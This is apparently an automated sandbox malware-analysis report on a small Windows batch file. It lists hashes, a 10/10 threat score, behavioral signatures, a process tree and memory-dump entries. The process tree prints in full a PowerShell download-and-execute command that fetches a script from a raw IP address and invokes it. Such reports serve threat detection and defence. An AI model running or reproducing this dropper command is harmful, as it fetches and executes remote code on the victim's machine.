Analysis
-
max time kernel
12s -
max time network
42s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
03-11-2020 01:10
Static task
static1
Behavioral task
behavioral1
Sample
af1dcc03472a3760e7f068ff48725448.bat
Resource
win7v20201028
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
af1dcc03472a3760e7f068ff48725448.bat
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
General
-
Target
af1dcc03472a3760e7f068ff48725448.bat
-
Size
214B
-
MD5
5cef3f9a231d5cf5d5fbd670d721dccd
-
SHA1
baf5a46fcbe4fae2a70e5d22449ff4ed03a93e33
-
SHA256
f14eb9a5eaf915aa1fb082741ab3c1d275e0dfed65d67b6dabc2cc7b0d01923f
-
SHA512
d51a3c23cd1e5a3b079f76697fd46e4ba37fe3890d8ae29c5106d364d86e2f662fee98483c1c6febaf5087a8c3f4b5b11aff9ff633fd263b939ab416442fda02
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://185.103.242.78/pastes/af1dcc03472a3760e7f068ff48725448
Signatures
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 5 1912 powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1912 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1912 powershell.exe 1912 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1912 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exedescription pid process target process PID 1700 wrote to memory of 1912 1700 cmd.exe powershell.exe PID 1700 wrote to memory of 1912 1700 cmd.exe powershell.exe PID 1700 wrote to memory of 1912 1700 cmd.exe powershell.exe PID 1700 wrote to memory of 1912 1700 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\af1dcc03472a3760e7f068ff48725448.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/af1dcc03472a3760e7f068ff48725448');Invoke-KSBCZTZ;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1912
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1912-0-0x0000000000000000-mapping.dmp
-
memory/1912-1-0x0000000073F20000-0x000000007460E000-memory.dmpFilesize
6.9MB
-
memory/1912-2-0x00000000023C0000-0x00000000023C1000-memory.dmpFilesize
4KB
-
memory/1912-3-0x00000000047A0000-0x00000000047A1000-memory.dmpFilesize
4KB
-
memory/1912-4-0x0000000002600000-0x0000000002601000-memory.dmpFilesize
4KB
-
memory/1912-5-0x0000000005240000-0x0000000005241000-memory.dmpFilesize
4KB
-
memory/1912-8-0x0000000005680000-0x0000000005681000-memory.dmpFilesize
4KB
-
memory/1912-13-0x00000000056F0000-0x00000000056F1000-memory.dmpFilesize
4KB
-
memory/1912-14-0x0000000006150000-0x0000000006151000-memory.dmpFilesize
4KB
-
memory/1912-21-0x0000000006290000-0x0000000006291000-memory.dmpFilesize
4KB
-
memory/1912-22-0x00000000062C0000-0x00000000062C1000-memory.dmpFilesize
4KB